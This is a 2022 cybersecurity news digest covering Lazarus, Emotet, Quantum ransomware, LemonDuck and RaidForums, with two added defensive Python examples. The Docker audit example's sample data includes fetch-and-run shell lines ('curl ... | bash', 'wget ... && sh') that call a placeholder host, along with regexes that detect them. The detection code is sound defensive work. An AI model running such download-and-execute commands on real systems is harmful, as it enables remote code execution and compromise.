Wednesday, April 27, 2022 // (IG): BB //Weekly Sponsor: Unsafe Waters
Chinese drone-maker DJI suspends ops in Russia, Ukraine
FROM THE MEDIA: In a first for a major Chinese tech company, drone-maker DJI Technologies announced on Tuesday that it will temporarily suspend business in both Russia and Ukraine.
"DJI is internally reassessing compliance requirements in various jurisdictions. Pending the current review, DJI will temporarily suspend all business activities in Russia and Ukraine. We are engaging with customers, partners and other stakeholders regarding the temporary suspension of business operations in the affected territories," declared DJI in a canned statement.
Last week the company issued another statement clarifying that it did not market or sell its products for military use and "unequivocally opposed attempts to attach weapons to [its] products." DJI also said it "refused to customize or enable modifications that would enable [its] products for military use."
"We want to reiterate a position we have long held: our products are made to improve people's lives and benefit the world, and we absolutely deplore any use of our products to cause harm. DJI has only ever made products for civilian use; they are not designed for military applications," insisted DJI.
READ THE STORY: The Record
A “Naver”-ending game of Lazarus APT
FROM THE MEDIA: Zscaler’s ThreatLabz research team has been closely monitoring a campaign targeting users in South Korea. This threat actor has been active for more than a year and continues to evolve its tactics, techniques, and procedures (TTPs); we believe with high confidence that the threat actor is associated with Lazarus Group, a sophisticated North Korean advanced persistent threat (APT) group.
In 2021, the main attack vector used by this threat actor was credential phishing attacks through emails, posing as Naver, the popular South Korean search engine and web portal.
In 2022, the same threat actor started spoofing various important entities in South Korea, including KRNIC (Korea Internet Information Center), Korean security vendors such as Ahnlab, cryptocurrency exchanges such as Binance, and others. Some details about this campaign were published in this Korean blog; however, that post did not perform the threat attribution.
Even though the TTPs of this threat actor evolved over time, there were critical parts of their infrastructure that were reused, allowing ThreatLabz to correlate the attacks and do the threat attribution with a high-confidence level. Our research led us to the discovery of command-and-control (C2) domains even before they were used in active attacks by the threat actor. This proactive discovery of attacker infrastructure helps us in preempting the attacks.
In this blog, we will share the technical details of the attack chains, and will explain how we correlated this threat actor to Lazarus.
READ THE STORY: Security Boulevard
Emotet botnet tests new techniques after global crackdown
FROM THE MEDIA: Emotet was widely considered one of the most prolific botnets in recent history. At the time of the international crackdown in January 2021, Emotet had infected more than 1.6 million computers globally. It cost hundreds of millions of dollars in damage, according to the Department of Justice.
The law enforcement action disrupted the Emotet activity, but did not completely shut down the operation. Emotet, linked to the threat actor TA542 or Mummy Spider, began to reemerge around November 2021, according to researchers.
“TA542 resumed its high volume threat activity attempting to distribute Emotet malware via email,” Sherrod DeGrippo, VP threat research and detection at Proofpoint said. “The January law enforcement activity was focused on disrupting the botnet infrastructure and did not include arrests.”
A key reason for the Emotet threat actor testing new techniques is likely linked to recent actions by Microsoft to cut off its previous attack techniques, according to Proofpoint researchers. Microsoft in February announced it would begin blocking Visual Basic for Applications macros by default starting in April. In July 2021, Microsoft announced plans to also disable XL4 macros.
READ THE STORY: Cyber Security Dive
Sun shoots out huge solar flare with freak event causing radio blackout on Earth
FROM THE MEDIA: The Sun spat out a huge solar flare this week before the freak solar event caused a radio blackout on Earth, it has been reported.
The rogue sunspot, dubbed AR2993, sputtered twice from the surface in rapid succession on Monday.
It produced an "overlapping of M1-class solar flares", it has been reported.
A solar flare is a brief eruption of energy-dense radiation from the surface of a star - which can disrupt radio and magnetic signals on Earth.
Flares that fall into the M-Class category are moderately sized, and have the potential to affect the Earth's polar regions and radio frequencies.
Monday's eruption caused a minor radio blackout in South-East Asia and Australia, SpaceWeather reports.
The experts explained to SpaceWeather: "The double-blast caused a minor albeit long-lasting radio blackout over southeast Asia and Australia."
The flares can also expose astronauts to higher levels of radiation during their missions.
READ THE STORY: Mirror
Nation-state Hackers Target Journalists with Goldbackdoor Malware
FROM THE MEDIA: According to security researchers at Stairwell, a recent campaign by APT37 used sophisticated malware to steal information about sources. The threat group appears to be utilizing a malware that is a successor of Bluelight called Goldbackdoor. Goldbackdoor is believed to be tied to the North Korean government due to its usage in actively targeting journalists with the goal of stealing sensitive information. Researchers state that the campaign began in March and is still active.
Stairwell researchers followed up on an initial report released by South Korea’s NK News, which detailed the campaign perpetrated by the North Korean-linked threat actor. In one instance, the cyberattackers stole from the private computer of a former South Korean intelligence official. In addition, the threat actor attempted to impersonate NK News and distribute novel malware targeting journalists who were using sources. NK News offered Stairwell certain details to aid their investigation into the incidents.
READ THE STORY: OODA Loop
4-Hour Time-to-Ransom Seen in Quantum Attack as Accelerated Ransomware Increasingly Common
FROM THE MEDIA: As part of a recent cyberattack, threat actors deployed ransomware less than four hours after compromising the victim’s environment, according to researchers with The DFIR Report.
The attack started with an IcedID payload being deployed on a user endpoint and led to the execution of Quantum ransomware only three hours and 44 minutes later. DFIR Report researchers described it as one of the fastest ransomware attacks they have observed to date.
In a Ryuk ransomware attack in October 2020, the threat actors started encrypting the victim’s data only 29 hours after the initial breach, but the median global dwell time for ransomware is roughly 5 days, according to Mandiant’s M-Trends 2022 report.
Once the ransomware has been executed, however, the victim’s data may be encrypted within minutes. A recent report from Splunk shows that ransomware needs an average of 43 minutes to encrypt data, while the fastest encryption time is less than 6 minutes.
The IcedID payload in the analyzed Quantum ransomware incident was contained within an ISO image that was likely delivered via email. The malware was hidden in the form of a file named “document,” which was a LNK file designed to execute a DLL (IcedID).
Once the DLL was executed, numerous discovery tasks ran leveraging various built-in Windows utilities, and a scheduled task was created to achieve persistence.
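The chain summarized above (a DLL launched from a delivered file, a burst of built-in discovery utilities, then a scheduled task for persistence) is the kind of sequence an endpoint detection can key on, and the short time-to-ransom is why the window matters. The following is an added example, not code from The DFIR Report or any vendor: it runs a sequence rule over constructed process-creation log lines. The loader names, the discovery-utility list, the 30-minute window and the log format are all assumptions of this example.

```python
"""Sequence detection over constructed Windows process-creation events.

Flags a host where a DLL is launched through a DLL loader, followed by a burst
of built-in discovery utilities and a scheduled-task creation inside a short
window. Every event below is constructed; the indicator lists and the window
are assumptions of this example, not values from the incident write-up.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed indicators (not from the article): binaries commonly used to run a
# DLL, and built-in utilities typically seen during post-access discovery.
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
DISCOVERY_TOOLS = {"whoami.exe", "net.exe", "net1.exe", "nltest.exe",
                   "ipconfig.exe", "systeminfo.exe", "tasklist.exe"}
PERSISTENCE_TOOL = "schtasks.exe"
WINDOW = timedelta(minutes=30)   # assumed: how long after the DLL launch we look
MIN_DISCOVERY = 3                # assumed: distinct discovery tools required


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    image: str      # basename of the executable
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    """Parse a constructed 'timestamp|host|image|cmdline' log line."""
    ts, host, image, cmdline = line.split("|", 3)
    return ProcEvent(datetime.fromisoformat(ts), host, image.lower(), cmdline)


def detect_chain(events):
    """Return {host: (dll_launch_ts, persistence_ts)} for hosts showing the chain."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_host.setdefault(ev.host, []).append(ev)
    hits = {}
    for host, evs in by_host.items():
        for i, start in enumerate(evs):
            # Stage 1: a DLL handed to a loader binary.
            if start.image not in DLL_LOADERS or ".dll" not in start.cmdline.lower():
                continue
            seen = set()
            for ev in evs[i + 1:]:
                if ev.ts - start.ts > WINDOW:
                    break
                # Stage 2: count distinct discovery utilities after the launch.
                if ev.image in DISCOVERY_TOOLS:
                    seen.add(ev.image)
                # Stage 3: scheduled-task creation once enough discovery was seen.
                elif (ev.image == PERSISTENCE_TOOL and "/create" in ev.cmdline.lower()
                      and len(seen) >= MIN_DISCOVERY):
                    hits[host] = (start.ts, ev.ts)
                    break
            if host in hits:
                break
    return hits


# Constructed sample telemetry: WS-01 shows the full chain within the window,
# WS-02 shows an ordinary rundll32 use with too little discovery and a late task.
SAMPLE_LOG = """
2022-04-25T09:01:10|WS-01|explorer.exe|C:\\Windows\\explorer.exe
2022-04-25T09:01:12|WS-01|rundll32.exe|rundll32.exe E:\\document.dll,init
2022-04-25T09:03:40|WS-01|whoami.exe|whoami
2022-04-25T09:03:55|WS-01|ipconfig.exe|ipconfig /all
2022-04-25T09:04:20|WS-01|systeminfo.exe|systeminfo
2022-04-25T09:12:05|WS-01|schtasks.exe|schtasks /create /tn Update /tr C:\\Users\\Public\\u.dll
2022-04-25T09:02:00|WS-02|rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
2022-04-25T09:30:00|WS-02|whoami.exe|whoami
2022-04-25T10:45:00|WS-02|schtasks.exe|schtasks /create /tn Backup /tr backup.exe
"""


def run_sample():
    """Run the rule over the constructed log; only WS-01 should be flagged."""
    return detect_chain(parse_event(l) for l in SAMPLE_LOG.strip().splitlines())


if __name__ == "__main__":
    for host, (first, last) in run_sample().items():
        print(f"{host}: DLL launch {first.time()} -> task creation {last.time()}")
```

The rule deliberately anchors on the sequence rather than any single command, since each stage alone (a loader running a DLL, an administrator running whoami, a legitimate scheduled task) is common; the window is what turns three ordinary events into one alert.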
READ THE STORY: Security Week
CrowdStrike Details LemonDuck Cryptojacking Container Attack Campaign
FROM THE MEDIA: CrowdStrike has published an alert detailing an active campaign that uses compromised containers to mine for cryptocurrency on Linux platforms launched via a botnet known as LemonDuck.
LemonDuck is a cryptomining botnet that previously was seen targeting Microsoft Exchange servers via the ProxyLogon vulnerability that enables it to use malware such as EternalBlue and BlueKeep to mine cryptocurrency, escalate privileges and move laterally across networks.
Specifically, it runs a malicious container on an exposed Docker API by using a custom Docker ENTRYPOINT to download a file named core.png, which is actually a Bash script disguised as an image. The file “core.png” was downloaded from a domain t.m7n0y[.]com, which is associated with LemonDuck. The domain has a self-signed certificate installed that was generated in May 2021 with an expiration date set for May 2022. The unique certificate signatures lead to other domains that are actively used by this threat actor and that might be the command-and-control mechanism used to manage the overall campaign.
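Two defender checks follow directly from the description above: whether the Docker API is reachable over plain TCP at all, and whether any running container's entrypoint fetches a remote file and hands it to a shell. The example below is added here and is not code from CrowdStrike or the Docker project; the records mimic the shape of `daemon.json` and `docker inspect` output but are constructed, and the domain `example.invalid` is a placeholder standing in for whatever host the script would be pulled from.

```python
"""Audit constructed Docker records for the pattern described above: a daemon
API exposed over plain TCP, and containers whose entrypoint downloads a remote
file and executes it with a shell.

Added example; the JSON below is constructed to mimic daemon.json and
`docker inspect` output and is not taken from any report.
"""
import json
import re

# Assumed heuristics: a download tool fetching a URL, combined with either a
# pipe into a shell or a shell invoked on an image-looking filename.
FETCH_RE = re.compile(r"\b(curl|wget)\b.*https?://", re.I)
EXEC_RE = re.compile(r"\|\s*(ba)?sh\b|\b(ba)?sh\s+\S+\.(png|jpg|gif)\b", re.I)


def daemon_exposes_plain_tcp(daemon_json: str) -> list:
    """Return tcp:// listeners from daemon.json that are not protected by TLS."""
    cfg = json.loads(daemon_json)
    hosts = cfg.get("hosts", [])
    tls = cfg.get("tlsverify", False)
    return [h for h in hosts if h.startswith("tcp://") and not tls]


def suspicious_containers(inspect_json: str) -> list:
    """Return names of containers whose Entrypoint/Cmd download and run a remote file."""
    out = []
    for c in json.loads(inspect_json):
        cfg = c.get("Config", {})
        parts = (cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or [])
        cmdline = " ".join(parts)
        if FETCH_RE.search(cmdline) and EXEC_RE.search(cmdline):
            out.append(c.get("Name", "?").lstrip("/"))
    return out


# Constructed daemon.json: the weak setting (API on 2375 without TLS) beside a
# hardened one (TLS-verified listener on 2376).
EXPOSED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed `docker inspect` records: two containers fetch and run a
# "png" from a placeholder host; the nginx container is benign.
SAMPLE_INSPECT_JSON = json.dumps([
    {"Name": "/miner-x", "Config": {
        "Entrypoint": ["/bin/sh", "-c"],
        "Cmd": ["curl -fsSL http://example.invalid/core.png | bash"]}},
    {"Name": "/web", "Config": {
        "Entrypoint": ["nginx"], "Cmd": ["-g", "daemon off;"]}},
    {"Name": "/builder", "Config": {
        "Entrypoint": ["/bin/sh", "-c"],
        "Cmd": ["wget -O /tmp/a.png http://example.invalid/a.png && sh /tmp/a.png"]}},
])


if __name__ == "__main__":
    print("plain-TCP listeners:", daemon_exposes_plain_tcp(EXPOSED_DAEMON_JSON))
    print("hardened listeners :", daemon_exposes_plain_tcp(HARDENED_DAEMON_JSON))
    print("suspicious containers:", suspicious_containers(SAMPLE_INSPECT_JSON))
```

On a real host the same functions would be fed `/etc/docker/daemon.json` and the output of `docker inspect $(docker ps -q)`; the entrypoint check is a heuristic and will not catch a script that is already baked into the image, so it complements rather than replaces image provenance controls.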
READ THE STORY: Container Journal
Police Seize RaidForums Hacking Site, Detaining Its Founder and Accomplices
FROM THE MEDIA: U.S. law enforcement seized the RaidForums hacking site and detained its founder and administrator, Diogo Santos Coelho, and two accomplices in operation TOURNIQUET.
The operation also saw “RaidForums.com,” “Rf.ws,” and “Raid.Lol” domains seized and the website’s computer infrastructure accessed.
Europol’s Joint Cybercrime Action coordinated the year-long operation involving multiple law enforcement agencies in the U.S., the UK, Sweden, Portugal, and Romania.
Launched in 2015, RaidForums deals in selling stolen databases, account credentials, credit card details, and Social Security numbers.
The RaidForums hacking site operated on the regular Internet instead of the dark web. It started as a forum for organized harassment, including swatting, before becoming an online marketplace for stolen information.
Babuk ransomware and Lapsus$ extortion gangs were among the high-profile threat actors who used the website.
READ THE STORY: CPO
State Dept offering $10 million for information on Russian cyber criminals
FROM THE MEDIA: The State Department has announced it is offering a reward of up to $10 million for information on a group of Russian cybercriminals.
In a press release on Tuesday, the department said its Rewards for Justice (RFJ) program is seeking information on six individuals who are allegedly connected to a criminal conspiracy involving malicious cyber activities affecting U.S. critical infrastructure.
The individuals were a part of the criminal conspiracy that took part in a destructive malware infection of computers worldwide in June 2017 using malware referred to as NotPetya, the State Department alleged.
The reported attack caused damage to computers of hospitals and other medical facilities in the Heritage Valley Health System in Pennsylvania, one of the largest manufacturers of pharmaceuticals in the U.S., and other U.S. private sector entities.
The attack collectively cost all of the targeted U.S. entities nearly $1 billion in losses, according to the State Department.
READ THE STORY: The Hill
How does Ukraine keep intercepting Russian military communications?
FROM THE MEDIA: Russia is regarded as one of the world's most advanced countries when it comes to anything and everything related to spying, and that includes secretive, high-tech military communications.
For Russian leader Vladimir Putin, a former intelligence officer, this is a particular point of pride. Yet Russia's reputation has taken a major blow with the often bumbling way the military has handled communications in Ukraine.
Here's a look at how the Ukrainians have effectively countered the Russians on multiple fronts:
Q. Ukraine keeps publicly releasing what it says are intercepted Russian communications from the battlefield. Wouldn't Ukraine want to keep this under wraps?
Ukraine feels there are huge public relations benefits in releasing intercepted material that's either embarrassing to Russia or points to Russian wrongdoing, possibly even atrocities.
Ukraine's military intelligence recently put out audio on social media, saying that as two Russian military members were speaking, one called for Ukrainian prisoners of war to be killed.
"Keep the most senior among them, and let the rest go forever. Let them go forever, damn it, so that no one will ever see them again, including relatives," a voice says on the tape.
READ THE STORY: NPR
Russia’s war could spread to space, the U.S. should be prepared
FROM THE MEDIA: In both cyber and space, nefarious and destructive actions can be difficult to attribute to a specific actor or sponsoring nation-state. In the cyber realm, experts puzzle that we haven’t yet experienced a Russian cyber attack given the capability displayed during the Colonial Pipeline ransomware disruption.
So far, Western banks and corporations’ defensive measures may account for the success. Or Russia may be walking a cyber tightrope — seeking not to cross the line of an “act of war” and hazard a U.S. or NATO response.
But there are troubling signs that the cyber détente may not hold for space. Putin recently chose an ominous location for his first public appearance since the retreat of Russian forces around Kyiv. Putin addressed Russian space agency workers from the backdrop of a Russian space rocket and stated peace efforts in Ukraine were at “a dead end.”
This is not the first veiled warning, and it is clear the United States is receiving the message. Vice President Kamala Harris announced that the United States has committed to not conducting destructive, direct-ascent anti-satellite (ASAT) missile testing. This is an indicator of just how seriously Washington is taking Russian threats. Yet, a self-imposed ban on ASAT tests is not enough.
As background, recall that in November 2021, while amassing forces on Ukraine’s borders, Russia launched an ASAT missile that destroyed one of its own satellites in orbit. It caused hazardous orbital debris and at the time seemed senseless. Russian authorities blathered and quibbled.
In hindsight, Russia’s demonstration of offensive space capabilities was on their pre-invasion checklist.
READ THE STORY: Spacenews
Pro-Russia hackers were inside Ukraine government networks long before the ground war started
FROM THE MEDIA: The cybersecurity company Trellix says pro-Russia hackers had infiltrated the networks of numerous Ukrainian government agencies long before Russia’s ground invasion started in late February. In fact, hackers had planted malicious code in the networks even before Russian troops began assembling at the Ukrainian border in 2021.
These findings were part of a broader report on the global cyberthreat environment from San Jose, California-based Trellix, which was created last year via a merger between cybersecurity firms FireEye and McAfee Enterprise. The firm bases its findings on an analysis of data collected from organizations using McAfee Enterprise software.
The Trellix analysts found evidence of “wiper” malware that was later activated remotely to delete all content on the hard drives of Ukrainian government computers. The malware matched the signature of malware used in the past by actors known to be associated with the Russian government, says Christiaan Beek, lead scientist and principal engineer at Trellix’s Threat Labs division. The malware also originated from the same time zone as Moscow’s, Beek says, adding that some instances of the malware may have come from others acting on Russia’s behalf.
READ THE STORY: Fastcompany
Russian-linked hackers say they've HACKED Coca-Cola: Stormous claims it has stolen financial data, passwords and accounts as they put it up for sale for $640,000 or 16 million Bitcoin
FROM THE MEDIA: A group of Russian-linked hackers claimed to have hacked Coca-Cola and put a large haul of data up for sale.
Stormous said it stole 161 gigabytes of financial data, passwords and accounts before putting the information on the market for $640,000 or 16 million Bitcoin.
The team revealed on Monday it had infiltrated the drinks company and got out 'without their knowledge'. Coca-Cola said it has launched an urgent investigation and already contacted the police.
'You will win and we will win,' read an apparent message from the group, which was later posted on Twitter.
'You will also contact us! We will explain more,' the message, in apparently broken English, continues. 'Good deal, we'll give you the right to pay the amount you want depending on the amount of data you want.'
It said the group downloaded 161 gigabytes from the company, which it would sell for more than $640,000 or more than 16 million in Bitcoin.
Among the stolen files, according to CISO Advisor, are financial data, passwords and commercial accounts.
READ THE STORY: Dailymail
Items of interest
EU Official Tweets a Warning to Elon Musk
FROM THE MEDIA: Elon Musk vowed to prioritize free speech as Twitter Inc.’s new owner, but a senior official from the European Union has warned the world’s richest person will still have to contend with the region’s strict content rules, just like any other social media company.
“Be it cars or social media, any company operating in Europe needs to comply with our rules--regardless of their shareholding,” said Internal Market Commissioner Thierry Breton, in a tweet Tuesday. “Mr Musk knows this well.”
In an interview with Bloomberg, Breton also added that Twitter will need to do more to combat hate speech, harassment and revenge porn.
Large platforms like Twitter, “they will have to have more moderators, they will have to make sure that all the moderators will speak the language in the country where they operate,” said Breton.
The EU approved the Digital Services Act over the weekend, giving European governments new power to take down illegal content, and demand platforms do more to tackle harmful content.
READ THE STORY: Bloomberg
Elon Musk turns attention to Starship problems immediately after buying Twitter (Video)
FROM THE MEDIA: SpaceX Starship Booster 7's damage from cryo testing has been leaked. Starlink is coming to Hawaiian Airlines. Axiom-1 returns to Earth. Crew-4 is launching tonight.
Solar Flare causes Radio Blackout in Asia & Australia (Video)
FROM THE MEDIA: The Sun is erupting & emitting solar flares. On Sunday, one such solar flare caused a radio blackout in Asia & Australia. What is a solar flare? How is it caused? Is it dangerous for human beings? Molly Gambhir brings you a report.
About this Product
These open source products are reviewed by analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com